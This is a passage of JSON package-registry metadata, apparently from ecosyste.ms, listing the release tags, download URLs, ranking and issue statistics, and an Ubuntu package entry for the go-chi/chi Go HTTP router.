rl":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.198Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/github.com/go-chi/chi/_examples/rest","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chi/_examples/rest","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chi/_examples/rest","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chi/_examples/rest/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Frest/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Frest/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Frest/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Frest/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Frest/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2F_examples%2Frest/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13545578,"name":"golang-github-go-chi-chi","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/go-chi/chi","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/go-chi/chi","keywords_array":["universe/golang"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-11T02:01:22.885Z","latest_release_published_at":"2026-02-11T02:01:22.885Z","latest_release_number":"5.0.7-1","last_synced_at":"2026-03-11T09:03:38.740Z","created_at":"2026-02-11T02:01:22.685Z","updated_at":"2026-08-08T10:51:35.207Z","registry_url":"https://launchpad.net/ubuntu/+source/golang-github-go-chi-chi","install_command":"apt-get install golang-github-go-chi-chi","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"golang-github-go-chi-chi-dev","standards_version":"4.5.1","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-golang, golang-any","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP 